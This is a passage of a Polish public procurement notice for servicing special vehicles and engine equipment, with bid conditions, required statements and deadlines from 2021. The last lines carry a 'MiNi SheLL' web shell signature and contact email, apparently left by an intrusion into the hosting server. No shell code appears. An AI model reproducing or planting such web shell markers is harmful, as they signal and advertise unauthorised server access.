gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>3.	Sytuacja ekonomiczna lub finansowa.<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. <br/>4.	Zdolność techniczna lub zawodowa.<br/>4.1. O udzielenie zamówienia w części 1 może ubiegać się Wykonawca, który w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres jest krótszy – w tym okresie, wykonał lub wykonuje co najmniej 2 usługi polegające na naprawach, serwisach i konserwacji sprzętu silnikowego, agrotechnicznego oraz zabudowy na pojazdach specjalnych określonych w opisie przedmiotu zamówienia- załączniku nr 6a do SWZ o wartości min. 50 000,00 zł brutto. Spełnienie tego warunku zostanie ocenione na podstawie oświadczenia, które Wykonawca składa wraz z ofertą (załącznik nr 2 do SWZ).<br/>4.2.	O udzielenie zamówienia w części 2 może ubiegać się Wykonawca, który w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres jest krótszy – w tym okresie, wykonał lub wykonuje co najmniej 2 usługi polegające na realizacji napraw, serwisów i konserwacji sprzętu silnikowego, oraz zabudowy na pojazdach specjalnych, określonych w opisie przedmiotu zamówienia - w załączniku nr 6b do SWZ, o wartości min. 70 000,00 zł brutto. Spełnienie tego warunku zostanie ocenione na podstawie oświadczenia, które Wykonawca składa wraz z ofertą (załącznik nr 2 do SWZ). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	Zamawiający nie wymaga przedstawienia podmiotowych środków dowodowych.<br/>2.	W celu potwierdzenia braku podstaw wykluczenia z udziału w postępowaniu, zamawiający zamiast podmiotowych środków dowodowych żąda oświadczenia wykonawcy -załącznik nr 2 SWZ. Weryfikacja Wykonawców ubiegających się o udzielenie zamówienia zostanie przeprowadzona wyłącznie na podstawie oświadczenia o braku podstaw wykluczenia - załącznik nr 2 SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Zamawiający nie wymaga przedstawienia podmiotowych środków dowodowych.<br/>2.	W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu, zamawiający zamiast podmiotowych środków dowodowych żąda oświadczenia wykonawcy o spełnianiu warunków udziału w postepowaniu - załącznik nr 2 SWZ. Weryfikacja Wykonawców ubiegających się o udzielenie zamówienia zostanie przeprowadzona wyłącznie na podstawie oświadczenia o spełniania warunków - załącznik nr 2 SWZ.<br/>3.	Postanowienia w sprawie dokumentów zastrzeżonych. <br/>3.1.	Wszystkie dokumenty złożone w prowadzonym postępowaniu są jawne, za wyjątkiem informacji zastrzeżonych na podstawie art. 18 ust. 3 ustawy Pzp przez składającego ofertę. <br/>3.2.	Dokumenty zastrzeżone Wykonawca wydziela (umieszczając je w osobnym pliku) i oznacza jako „TAJEMNICA PRZEDSIĘBIORSTWA”.<br/>3.3.	Wykonawca zastrzegający informacje zawarte w swojej ofercie musi załączyć uzasadnienie, dlaczego nie mogą być one udostępnione innym podmiotom. Zastrzeżenie dokumentów dokonane bez uzasadnienia, będzie traktowane jako bezskuteczne.<br/>3.4.	Wykonawca nie może zastrzec informacji i dokumentów, których jawność wynika z obowiązujących aktów prawnych, m.in. zapisy art. 222 ust. 5 ustawy Pzp.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedstawienia przedmiotowych środków dowodowych, tj. dokumentów dotyczących przedmiotu zamówienia. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Wykonawca składa wraz z ofertą następujące dokumenty i załączniki:<br/>1.1.	formularz ofertowy wypełniony i podpisany przez Wykonawcę zgodnie ze wzorem – załącznik nr 1 do SWZ;<br/>1.2.	oświadczenie stanowiące wstępne potwierdzenie, że wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu przygotowany zgodnie ze wzorem – załącznik nr 2 do SWZ; (w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie składa każdy z Wykonawców)<br/>1.3.	formularz cenowy sporządzony z wykorzystaniem wzoru – załącznik nr 3 do SWZ,<br/>1.4.	pełnomocnictwo osób podpisujących ofertę, o ile nie wynika z przepisów prawa lub innych dokumentów, złożone w oryginale albo w formie kopii poświadczonej notarialnie – treść pełnomocnictwa powinna dokładnie określić zakres umocowania - jeśli dotyczy.<br/>1.5.	pełnomocnictwo do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - jeśli dotyczy.<br/>1.6.	oświadczenia Wykonawców wspólnie ubiegających się o udzielenie zamówienia –załącznik nr 5 do SWZ- jeżeli dotyczy<br/>1.7. zobowiązanie podmiotu udostępniającego zasoby – załącznik nr 7 do SWZ - jeśli dotyczy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Postanowienia dotyczące wnoszenia oferty wspólnej przez dwa lub więcej podmiotów gospodarczych (np. konsorcja, spółki cywilne):<br/>1.	Sposób weryfikacji braku podstaw wykluczenia i spełnienia warunków udziału w postępowaniu przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>1.1.	Oświadczenia potwierdzające zdolność techniczną lub zawodową – załącznik nr 2 do SWZ każdy z Wykonawców składa osobno. <br/>1.2.	Oświadczenia potwierdzające brak podstaw wykluczenia – załącznik nr 2 do SWZ każdy z Wykonawców składa osobno. <br/>2.	W przypadku wspólnego ubiegania się o udzielenie zamówienia, Wykonawcy zobowiązani są ustanowić lidera/pełnomocnika do reprezentowania ich w postępowaniu przetargowym oraz zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. Powyższe nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>3.	W powyższym przypadku oświadczenie według wzoru z załącznika nr 5 do SWZ składają wraz z ofertą Wykonawcy wspólnie ubiegający się o zamówienie.<br/>4.	Jeżeli oferta wykonawców, o których mowa w RODZIALE 7 SWZ zostanie wybrana, zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego, kopię umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że Zamawiający przewidział możliwość dokonania takiej zmiany oraz określił warunki takiej zmiany.<br/>2.	Wszelkie zmiany w umowie muszą być dokonane w formie pisemnej pod rygorem nieważności.<br/>3.	Strony dopuszczają zmianę umowy w zakresie miejsca świadczenia usług pod warunkiem, że odległość do nowego miejsca nie przekroczy ………..km (odległość wskazana w ofercie). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-08 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Platformy Zakupowej dostępnej na stronie internetowej: https://platformazakupowa.pl/pn/32_blot w zakładce przedmiotowego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-08 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-07</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Czas realizacji dla części 1 i 2 - 11 miesięcy od dnia podpisania umowy, ale nie wcześniej niż od dnia 01.01.2022 r. lub do wyczerpania wartości umowy brutto <br/>w zależności, które zdarzenie nastąpi pierwsze.<br/>Zamawiający stosownie do art. 95 ust. 1 ustawy Pzp, określa obowiązek zatrudnienia na podstawie umowy o pracę osób wykonujących czynności związanych z naprawą, konserwacją i przeglądem zabudowy specjalnej oraz sprzętu silnikowego i agro będącego na wyposażeniu kompanii obsługi lotniska oraz czynności związanych z naprawą, konserwacją i przeglądem zabudowy specjalnej oraz sprzętu silnikowego będącego na wyposażeniu wojskowej straży pożarnej .<br/>Zamawiający wymaga zawarcia umowy na piśmie.<br/>Umowa zostanie zawarta w następujący sposób:<br/>[1] Zamawiający przesyła do wykonawcy umowę w formie elektronicznej;<br/>[2] Wykonawca sprawdza poprawność zawartych w umowie danych, parafuje każdą stronę, składa odręczny podpis, pieczęć i wysyła do Zamawiającego;<br/>[3] umowa zostaje podpisana i zarejestrowana przez zamawiającego – wówczas umowa nabiera mocy prawnej;<br/>[4] zamawiający informuje o powyższym fakcie wykonawcę drogą elektroniczną i odsyła trzeci egzemplarz umowy za pośrednictwem poczty lub firmy kurierskiej.<br/>LUB<br/>Zamawiający zawiadomi wybranego Wykonawcę o miejscu i terminie podpisania umowy. Osoby reprezentujące wykonawcę przy podpisywaniu umowy powinny posiadać ze sobą dokumenty potwierdzające ich umocowanie do podpisania umowy, o ile umocowanie to nie będzie wynikać z dokumentów załączonych do oferty.<br/>Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza zobowiązany jest złożyć Zamawiającemu przed podpisaniem umowy dokumenty potwierdzające posiadanie polisy ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 50 000,00 zł (słownie: pięćdziesiąt tysięcy złotych 00/100), obejmującą czas trwania niniejszej umowy.<br/>Niedopełnienie powyższych formalności przez wybranego Wykonawcę będzie potraktowane przez Zamawiającego jako niemożność zawarcia umowy w sprawie zamówienia publicznego z przyczyn leżących po stronie Wykonawcy.

Creat By MiNi SheLL
Email: jattceo@gmail.com